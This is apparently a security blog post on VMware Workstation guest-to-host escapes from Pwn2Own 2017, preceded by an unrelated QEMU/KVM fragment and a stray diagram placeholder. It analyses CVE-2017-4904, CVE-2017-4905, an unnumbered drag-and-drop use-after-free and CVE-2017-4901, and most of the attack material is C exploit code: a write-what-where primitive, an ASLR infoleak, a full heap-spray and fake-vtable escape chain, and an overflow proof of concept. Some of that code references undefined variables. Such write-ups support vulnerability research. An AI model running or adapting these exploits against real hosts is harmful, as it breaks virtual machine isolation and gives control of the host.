QEMU creates one process for every VM. For each vCPU, QEMU creates a thread. These are regular threads and they get scheduled by the OS like any other thread. As these threads get run time, QEMU creates impression of multiple CPUs for the software running inside its VM. Given QEMU’s roots in emulation, it can emulate I/O which is something that KVM may not fully support – take example of a VM with particular serial port on a host that doesn’t have it. Now, when software inside VM performs I/O, the VM exits to KVM. KVM looks at the reason and passes control to QEMU along with pointer to info about the I/O request. QEMU emulates the I/O device for that requests – thus fulfilling it for software inside VM – and passes control back to KVM. KVM executes a VMRESUME to let that VM proceed.

In the end, let us summarise the overall picture in a diagram:

overall-diag

A bunch of Red Pills: VMware Escapes

Background

VMware is one of the leaders in virtualization nowadays. They offer VMware ESXi for cloud, and VMware Workstation and Fusion for Desktops (Windows, Linux, macOS).
The technology is very well known to the public: it allows users to run unmodified guest “virtual machines”.
Often those virtual machines are not trusted, and they must be isolated.
VMware goes to a great deal to offer this isolation, especially on the ESXi product where virtual machines of different actors can potentially run on the same hardware. So a strong isolation of is paramount importance.

Recently at Pwn2Own the “Virtualization” category was introduced, and VMware was among the targets since Pwn2Own 2016.

In 2017 we successfully demonstrated a VMware escape from a guest to the host from a unprivileged account, resulting in executing code on the host, breaking out of the virtual machine.

If you escape your virtual machine environment then all isolation assurances are lost, since you are running code on the host, which controls the guests.

But how VMware works?

In a nutshell it often uses (but they are not strictly required) CPU and memory hardware virtualization technologies, so a guest virtual machine can run code at native speed most of the time.

But a modern system is not just a CPU and Memory, it also requires lot of other Hardware to work properly and be useful.

This point is very important because it will consist of one of the biggest attack surfaces of VMware: the virtualized hardware.

Virtualizing a hardware device is not a trivial task. It’s easily realized by reading any datasheet for hardware software interface for a PC hardware device.

VMware will trap on I/O access on this virtual device and it needs to emulate all those low level operations correctly, since it aims to run unmodified kernels, its emulated devices must behave as closely as possible to their real counterparts.

Furthermore if you ever used VMware you might have noticed its copy paste capabilities, and shared folders. How those are implemented?

To summarize, in this blog post we will cover quite some bugs. Both in this “backdoor” functionalities that support those “extra” services such as C&P, and one in a virtualized device.

Altough recently lot of VMware blogpost and presentations were released, we felt the need to write our own for the following reasons:

  • First, no one ever talked correctly about our Pwn2Own bugs, so we want to shed light on them.
  • Second, some of those published resources either lack of details or code.

So we hope you will enjoy our blogpost!

We will begin with some background informations to get you up to speed.

Let’s get started!

Overall architecture

A complex product like VMware consists of several components, we will just highlight the most important ones, since the VMware architecture design has already been discussed extensively elsewhere.

  • VMM: this piece of software runs at the highest possible privilege level on the physical machine. It makes the VMs tick and run and also handles all the tasks which are impossible to perform from the host ring 3 for example.
  • vmnat: vmnat is responsible for the network packet handling, since VMware offers advanced functionalities such as NAT and virtual networks.
  • vmware-vmx: every virtual machine started on the system has its own vmware-vmx process running on the host. This process handles lot of tasks which are relevant for this blogpost, including lot of the device emulation, and backdoor requests handling. The result of the exploitation of the chains we will present will result in code execution on the host in the context of vmware-vmx.

Backdoor

The so called backdoor, it’s not actually a “backdoor”, it’s simply a mechanism implemented in VMware for guest-host and host-guest communication.

A useful resource for understanding this interface is the open-vm-tools repository by VMware itself.

Basically at the lower level, the backdoor consists of 2 IO ports 0x5658 and 0x5659, the first for “traditional” communication, the other one for “high bandwidth” ones.

The guest issues in/out instructions on those ports with some registers convention and it’s able to communicate with the VMware running on the host.

The hypervisor will trap and service the request.

On top of this low level mechanism, vmware implemented some more convenient high level protocols, we encourage you to check the open-vm-tools repository to discover those since they were covered extensively elsewhere we will not spend too much time covering the details.
Just to mention a few of those higher level protocols: drag and drop, copy and paste, guestrpc.

The fundamental points to remember are:

  • It’s a interface guest-host that we can use
  • It exposes complex services and functionalities.
  • Lot of these functionalities can be used from ring3 in the guest VM

xHCI

xHCI (aka eXtensible Host Controller Interface) is a specification of a USB host controller (normally implemented in hardware in normal PC) by Intel which supports USB 1.x, 2.0 and 3.x.

You can find the relevant specification here.

On a physical machine it’s often present:

1
00:14.0 USB controller: Intel Corporation C610/X99 series chipset USB xHCI Host Controller (rev 05)

In VMware this hardware device is emulated, and if you create a Windows 10 virtual machine, this emulated controller is enabled by default, so a guest virtual machine can interact with this particular emulated device.

The interaction, like with a lot of hardware devices, will take place in the PCI memory space and in the IO memory mapped space.

This very low level interface is the one used by the OS kernel driver in order to schedule usb work, and receive data and all the tasks related to USB.

Just by looking at the specifications alone, which are more than 600 pages, it’s no surprise that this piece of hardware and its interface are very complex, and the specifications just covers the interface and the behavior, not the actual implementation.

Now imagine actually emulating this complex hardware. You can imagine it’s a very complex and error prone task, as we will see soon.

Often to speak directly with the hardware (and by consequence also virtualized hardware), you need to run in ring0 in the guest. That’s why (as you will see in the next paragraphs) we used a Windows Kernel LPE inside the VM.

Mitigations

VMware ships with “baseline” mitigations which are expected in modern software, such as ASLR, stack cookies etc.

More advanced Windows mitigations such as CFG, Microsoft version of Control Flow Integrity and others, are not deployed at the time of writing.

Pwn2Own 2017: VMware Escape by two bugs in 1 second

Team Sniper (Keen Lab and PC Mgr) targeting VMware Workstation (Guest-to-Host), and the event certainly did not end with a whimper. They used a three-bug chain to win the Virtual Machine Escapes (Guest-to-Host) category with a VMware Workstation exploit. This involved a Windows kernel UAF, a Workstation infoleak, and an uninitialized buffer in Workstation to go guest-to-host. This category ratcheted up the difficulty even further because VMware Tools were not installed in the guest.

The following vulnerabilities were identified and analyzed:

  • XHCI: CVE-2017-4904 critical Uninitialized stack value leading to arbitrary code execution
  • CVE-2017-4905 moderate Uninitialized memory read leading to information disclosure

CVE-2017-4904 xHCI uninitialized stack variable

This is an uninitialized variable vulnerability residing in the emulated XHCI device, when updating the changes of Device Context into the guest physical memory.

The XHCI reports some status info to system software through “Device Context” structure. The address of a Device Context is in the DCBAA (Device Context Base Address Array), whose address is in the DCBAAP (Device Context Base Address Array Pointer) register. Both the Device Context and DCBAA resides in the physical RAM. And the XHCI device will keep an internal cache of the Device Context and only updates the one in physical memory when some changes happen. When updating the Device Context, the virtual machine monitor will map the guest physical memory containing the Device Context into the memory space of the monitor process, then do the update. However the mapping could fail and leave the result variable untouched. The code does not take precaution against it and directly uses the result as a destination address for memory writing, resulting an uninitialized variable vulnerability.

To trigger this bug, the following steps should be taken:

  1. Issue a “Enable Slot” command to XHCI. Get the result slot number from Event TRB.
  2. Set the DCBAAP to point to a controlled buffer.
  3. Put some invalid physical address, eg. 0xffffffffffffffff, into the corresponding slot in the DCBAA buffer.
  4. Issue an “Address Device” command. The XHCI will read the base address of Device Context from DCBAA to an internal cache and the value is an controlled invalid address.
  5. Issue an “Configure Endpoint” command. Trigger the bug when XHCI updates the corresponding Device Context.

The uninitialized variable resides on the stack. Its value can be controlled in the “Configure Endpoint” command with one of the Endpoint Context of the Input Context which is also on the stack. Therefore we can control the destination address of the write. And the contents to be written are from the Endpoint Context of the Device Context, which is copied from the corresponding controllable Endpoint Context of the Input Context, resulting a write-what-where primitive. By combining with the info leak vulnerability, we can overwrite some function pointers and finally rop to get arbitrary code execution.

Exploit code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
void write_what_where(uint64 xhci_base, uint64 where, uint64 what)
{
    xhci_cap_regs *cap_regs = (xhci_cap_regs*)xhci_base;
    xhci_op_regs *op_regs = (xhci_op_regs*)(xhci_base + (cap_regs->hc_capbase & 0xff));
    xhci_doorbell_array *db = (xhci_doorbell_array*)(xhci_base + cap_regs->db_off);
    int max_slots = cap_regs->hcs_params1 & 0xf;
    uint8 *playground = (uint8 *)ExAllocatePoolWithTag(NonPagedPool, 0x1000, 'NEEK');
    if (!playground) return;
    playground[0] = 0;
    uint64 *dcbaa = (uint64*)playground;
    playground += sizeof(uint64) * max_slots;
    for (int i = 0; i < max_slots; ++i)
    {
        dcbaa[i] = 0xffffffffffffffc0;
    }
    op_regs->dcbaa_ptr = MmGetPhysicalAddress(dcbaa).QuadPart;
    
    playground = (uint8*)(((uint64)playground + 0x10) & (~0xf));
    input_context *input_ctx = (input_context*)playground;
    
    playground += sizeof(input_context);
    playground = (uint8*)(((uint64)playground + 0x40) & (~0x3f));
    uint8 *cring = playground;
    uint64 cmd_ring = MmGetPhysicalAddress(cring).QuadPart | 1;
    
    trb_t *cmd = (trb_t*)cring;
    memset((void*)cmd, 0, sizeof(trb_t));
    TRB_SET(TT, cmd, TRB_CMD_ENABLE_SLOT);
    TRB_SET(C, cmd, 1);
    cmd++;
    memset(input_ctx, 0, sizeof(input_context));
    input_ctx->ctrl_ctx.drop_flags = 0;
    input_ctx->ctrl_ctx.add_flags = 3;
    input_ctx->slot_ctx.context_entries = 1;
    memset((void*)cmd, 0, sizeof(trb_t));
    TRB_SET(TT, cmd, TRB_CMD_ADDRESS_DEV);
    TRB_SET(ID, cmd, 1);
    TRB_SET(DC, cmd, 1);
    cmd->ptr = MmGetPhysicalAddress(input_ctx).QuadPart;
    TRB_SET(C, cmd, 1);
    cmd++;
    TRB_SET(C, cmd, 0);
    op_regs->cmd_ring = cmd_ring;
    db.doorbell[0] = 0;
    
    cmd = (trb_t*)cring;
    memset(input_ctx, 0, sizeof(input_context));
    input_ctx->ctrl_ctx.drop_flags = 0;
    input_ctx->ctrl_ctx.add_flags = (1u<<31)|(1u<<30);
    input_ctx->slot_ctx.context_entries = 31;
    uint64 *value = (uint64*)(&input_ctx->ep_ctx[30]);
    uint64 *addr = ((uint64*)(&input_ctx->ep_ctx[31])) + 1;
    value[0] = 0;
    value[1] = what;
    value[2] = 0;
    addr[0] = where - 0x3b8;
    memset((void*)cmd, 0, sizeof(trb_t));
    TRB_SET(TT, cmd, TRB_CMD_CONFIGURE_EP);
    TRB_SET(ID, cmd, 1);
    TRB_SET(DC, cmd, 0);
    cmd->ptr = MmGetPhysicalAddress(input_ctx).QuadPart;
    TRB_SET(C, cmd, 1);
    cmd++;
    TRB_SET(C, cmd, 0);
    op_regs->cmd_ring = cmd_ring;
    db.doorbell[0] = 0;
}

CVE-2017-4905 Backdoor uninitialized memory read

This is an uninitialized memory vulnerability present in the Backdoor callback handler. A buffer will be allocated on the stack when processing the backdoor requests. This buffer should be initialized in the BDOORHB callback. But when requesting invalid commands, the callback fails to properly clear the buffer, causing the uninitialized content of the stack buffer to be leaked to the guest. With this bug we can effectively defeat the ASLR of vmware-vmx running on the host. The successful rate to exploit this bug is 100%.

Credits to JunMao of Tencent PCManager.

PoC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
void infoleak()
{
    char *buf = (char *)VirtualAlloc(0, 0x8000, MEM_COMMIT, PAGE_READWRITE);
    memset(buf, 0, 0x8000);
    Backdoor_proto_hb hb;
    memset(&hb, 0, sizeof(Backdoor_proto_hb));
    hb.in.size = 0x8000;
    hb.in.dstAddr = (uintptr_t)buf;
    hb.in.bx.halfs.low = 2;
    Backdoor_HbIn(&hb);
    // buf will be filled with contents leaked from vmware-vmx stack
    // 
    ...
    VirtualFree((void *)buf, 0x8000, MEM_DECOMMIT);
    return;
}

Behind the scenes of Pwn2Own 2017

Exploit the UAF bug in VMware Workstation Drag n Drop with single bug

By fuzzing VMware workstation, we found this bug and complete the whole stable exploit chain using this single bug in the last few days of Feb. 2017. Unfortunately this bug was patched in VMware workstation 12.5.3 released on 9 Mar. 2017. After we noticed few papers talked about this bug, and VMware even have no CVE id assigned to this bug. That’s such a pity because it’s the best bug we have ever seen in VMware workstaion, and VMware just patched it quietly. Now we’re going to talk about the way to exploit VMware Workstation with this single bug.

Exploit Code

This exploit successful rate is approximately 100%.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
char *initial_dnd = "tools.capability.dnd_version 4";
static const int cbObj = 0x100;
char *second_dnd = "tools.capability.dnd_version 2";
char *chgver = "vmx.capability.dnd_version";
char *call_transport = "dnd.transport ";
char *readstring = "ToolsAutoInstallGetParams";
typedef struct _DnDCPMsgHdrV4
{
    char magic[14];
    char dummy[2];
    size_t ropper[13];
    char shellcode[175];
    char padding[0x80];
} DnDCPMsgHdrV4;


void PrepareLFH()
{
    char *result = NULL;
    char *pObj = malloc(cbObj);
    memset(pObj, 'A', cbObj);
    pObj[cbObj - 1] = 0;
    for (int idx = 0; idx < 1; ++idx) // just occupy 1
    {
        char *spary = stringf("info-set guestinfo.k%d %s", idx, pObj);
        RpcOut_SendOneRaw(spary, strlen(spary), &result, NULL); //alloc one to occupy 4
    }
    free(pObj);
}

size_t infoleak()
{
#define MAX_LFH_BLOCK 512
    Message_Channel *chans[5] = {0};
    for (int i = 0; i < 5; ++i)
    {
        chans[i] = Message_Open(0x49435052);
        if (chans[i])
        {
            Message_SendSize(chans[i], cbObj - 1); //just alloc
        }
        else
        {
            Message_Close(chans[i - 1]); //keep 1 channel valid
            chans[i - 1] = 0;
            break;
        }
    }
    PrepareLFH(); //make sure we have at least 7 hole or open and occupy next LFH block
    for (int i = 0; i < 5; ++i)
    {
        if (chans[i])
        {
            Message_Close(chans[i]);
        }
    }

    char *result = NULL;
    char *pObj = malloc(cbObj);
    memset(pObj, 'A', cbObj);
    pObj[cbObj - 1] = 0;
    char *spary2 = stringf("guest.upgrader_send_cmd_line_args %s", pObj);
    while (1)
    {
        for (int i = 0; i < MAX_LFH_BLOCK; ++i)
        {
            RpcOut_SendOneRaw(tov4, strlen(tov4), &result, NULL);
            RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
            RpcOut_SendOneRaw(tov2, strlen(tov2), &result, NULL);
            RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
        }

        for (int i = 0; i < MAX_LFH_BLOCK; ++i)
        {
            Message_Channel *chan = Message_Open(0x49435052);
            if (chan == NULL)
            {
                puts("Message send error!");
                Sleep(100);
            }
            else
            {
                Message_SendSize(chan, cbObj - 1);
                Message_RawSend(chan, "\xA0\x75", 2); //just ret
                Message_Close(chan);
            }
        }
        Message_Channel *chan = Message_Open(0x49435052);
        Message_SendSize(chan, cbObj - 1);
        Message_RawSend(chan, "\xA0\x74", 2);                                 //free
        RpcOut_SendOneRaw(dndtransport, strlen(dndtransport), &result, NULL); //trigger double free
        for (int i = 0; i < min(cbObj-3,MAX_LFH_BLOCK); ++i)
        {
            RpcOut_SendOneRaw(spary2, strlen(spary2), &result, NULL);
            Message_RawSend(chan, "B", 1);
            RpcOut_SendOneRaw(readstring, strlen(readstring), &result, NULL);
            if (result[0] == 'A' && result[1] == 'A' && strcmp(result, pObj))
            {
               Message_Close(chan); //free the string
                for (int i = 0; i < MAX_LFH_BLOCK; ++i)
                {
                    puts("Trying to leak vtable");
                    RpcOut_SendOneRaw(tov4, strlen(tov4), &result, NULL);
                    RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
                    RpcOut_SendOneRaw(readstring, strlen(readstring), &result, NULL);
                    size_t p = 0;
                    if (result)
                    {
                        memcpy(&p, result, min(strlen(result), 8));
                        printf("Leak content: %p\n", p);
                    }
                    size_t low = p & 0xFFFF;
                    if (low == 0x74A8 || //RpcBase
                        low == 0x74d0 || //CpV4
                        low == 0x7630)   //DnDV4
                    {
                        printf("vmware-vmx base: %p\n", (p & (~0xFFFF)) - 0x7a0000);
                        return (p & (~0xFFFF)) - 0x7a0000;
                    }
                    RpcOut_SendOneRaw(tov2, strlen(tov2), &result, NULL);
                    RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
                }
            }
        }
        Message_Close(chan);
    }
    return 0;
}

void exploit(size_t base)
{
    char *result = NULL;
    char *uptime_info = stringf("SetGuestInfo -7-%I64u", 0x41414141);
    char *pObj = malloc(cbObj);
    memset(pObj, 0, cbObj);

    DnDCPMsgHdrV4 *hdr = malloc(sizeof(DnDCPMsgHdrV4));
    memset(hdr, 0, sizeof(DnDCPMsgHdrV4));
    memcpy(hdr->magic, call_transport, strlen(call_transport));
    while (1)
    {
        RpcOut_SendOneRaw(second_dnd, strlen(second_dnd), &result, NULL);
        RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
        for (int i = 0; i < MAX_LFH_BLOCK; ++i)
        {
            Message_Channel *chan = Message_Open(0x49435052);
            Message_SendSize(chan, cbObj - 1);
            size_t fake_vtable[] = {
                base + 0xB87340,
                base + 0xB87340,
                base + 0xB87340,
                base + 0xB87340};

            memcpy(pObj, &fake_vtable, sizeof(size_t) * 4);

            Message_RawSend(chan, pObj, sizeof(size_t) * 4);
            Message_Close(chan);
        }
        RpcOut_SendOneRaw(uptime_info, strlen(uptime_info), &result, NULL);
        RpcOut_SendOneRaw(hdr, sizeof(DnDCPMsgHdrV4), &result, NULL);
        //check pwn success?
        RpcOut_SendOneRaw(readstring, strlen(readstring), &result, NULL);
        if (*(size_t *)result == 0xdeadbeefc0debabe)
        {
            puts("VMware escape success! \nPwned by KeenLab, Tencent");
            RpcOut_SendOneRaw(initial_dnd, strlen(initial_dnd), &result, NULL);//fix dnd to callable prevent vmtoolsd problem
            RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
            return;
        }
        //host dndv4 fill in, try to clean up and free again
        Sleep(100);
        puts("Object wrong! Retry...");
        RpcOut_SendOneRaw(initial_dnd, strlen(initial_dnd), &result, NULL);
        RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
    }
}

int main(int argc, char *argv[])
{
    int ret = 1;
    __try
    {
        while (1)
        {
            size_t base = 0;
            do
            {
                puts("Leaking...");
                base = infoleak();
            } while (!base);
            puts("Pwning...");
            exploit(base);
            break;
        }
    }
    __except (ExceptionIsBackdoor(GetExceptionInformation()) ? EXCEPTION_EXECUTE_HANDLER : EXCEPTION_CONTINUE_SEARCH)
    {
        fprintf(stderr, NOT_VMWARE_ERROR);
        return 1;
    }
    return ret;
}

CVE-2017-4901 DnDv3 HeapOverflow

The drag-and-drop (DnD) function in VMware Workstation and Fusion has an out-of-bounds memory access vulnerability. This may allow a guest to execute code on the operating system that runs Workstation or Fusion.

After VMware released 12.5.3, we continued auditing the DnD and finally found another heap overflow bug similar to CVE-2016-7461. This bug was known by almost every participants of VMware category in Pwn2own 2017. Here we present the PoC of this bug.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
void poc()
{
    int n;
    char *req1 = "tools.capability.dnd_version 3";
    char *req2 = "vmx.capability.dnd_version";
    RpcOut_SendOneRaw(req1, strlen(req1), NULL, NULL);
    RpcOut_SendOneRaw(req2, strlen(req2), NULL, NULL);

    char req3[0x80] = "dnd.transport ";
    n = strlen(req3);
    *(int*)(req3+n) = 3;
    *(int*)(req3+n+4) = 0;
    *(int*)(req3+n+8) = 0x100;
    *(int*)(req3+n+0xc) = 0;
    *(int*)(req3+n+0x10) = 0;
    // allocate buffer of 0x100 bytes
    RpcOut_SendOneRaw(req3, n+0x14, NULL, NULL);

    char req4[0x1000] = "dnd.transport ";
    n = strlen(req4);
    *(int*)(req4+n) = 3;
    *(int*)(req4+n+4) = 0;
    *(int*)(req4+n+8) = 0x1000;
    *(int*)(req4+n+0xc) = 0x800;
    *(int*)(req4+n+0x10) = 0;
    for (int i = 0; i < 0x800; ++i)
        req4[n+0x14+i] = 'A';
    // overflow with 0x800 bytes of 'A'
    RpcOut_SendOneRaw(req4, n+0x14+0x800, NULL, NULL);
}

Conclusions

In this article we presented several VMware bugs leading to guest to host virtual machine escape.
We hope to have demonstrated that not only VM breakouts are possible and real, but also that a determined attacker can achieve multiple of them, and with good reliability.
We feel that in our industry there is the misconception that if untrusted software runs inside a VM, then we will be safe.
Think about the malware industry, which heavily relies on VMs for analysis, or the entire cloud which basically runs on hypervisors.
For sure it’s an additional protection layer, raising the bar for an attacker to get full compromise, so it’s a very good practice to adopt it.
But we must not forget that essentially it’s just another “layer of sandboxing” which can be bypassed or escaped.
So great care must be taken to secure also this security layer.